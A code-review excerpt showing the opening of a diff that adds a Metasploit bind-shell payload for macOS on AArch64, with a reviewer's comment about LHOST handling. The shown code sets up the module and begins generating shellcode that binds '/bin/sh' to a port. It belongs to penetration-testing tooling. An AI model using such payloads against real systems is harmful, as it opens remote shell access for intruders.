modules/payloads/singles/osx/aarch64/shell_bind_tcp.rb

```diff
@@ -0,0 +1,222 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+module MetasploitModule
+
+  CachedSize = 236
+
+  include Msf::Payload::Single
+  include Msf::Payload::Osx
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'OS X x64 Shell Bind TCP',
+      'Description'   => 'Bind an arbitrary command to an arbitrary port',
+      'Author'        => [ 'alanfoster' ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'osx',
+      'Arch'          => ARCH_AARCH64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix
+    ))
+
+    # exec payload options
+    register_options(
+      [
+        OptString.new('CMD',  [ true,  "The command string to execute", "/bin/sh" ]),
+        Opt::LPORT(4444)
+    ])
+  end
+
+  def generate(_opts = {})
+    # Split the cmd string into arg chunks
+    cmd_str = datastore['CMD']
+    cmd_and_args = Shellwords.shellsplit(cmd_str).map { |s| "#{s}\x00" }
+
+    cmd = cmd_and_args[0]
+    args = cmd_and_args[1..]
+
+    # Don't smash the real sp register, re-create our own on the x9 scratch register
+    stack_register = :x9
+    cmd_string_in_x0 = create_aarch64_string_in_stack(
+      cmd,
+      registers: {
+        destination: :x0,
+        stack: stack_register
+      }
+    )
+
+    lport = datastore['LPORT'].to_i
+    lhost = datastore['LHOST']
+
+    lport_hex = [lport].pack('v').bytes.map { |b| b.to_s(16).rjust(2, '0') }.join
+    lhost_hex = [IPAddr.new(lhost, Socket::AF_INET).to_i].pack('L<').bytes.map { |b| b.to_s(16).rjust(2, '0') }
```

Comment:
TODO: Will need to verify here if you're allowed to control the LHOST for bind payloads or if it should be NULL by default to bind to 0.0.0.0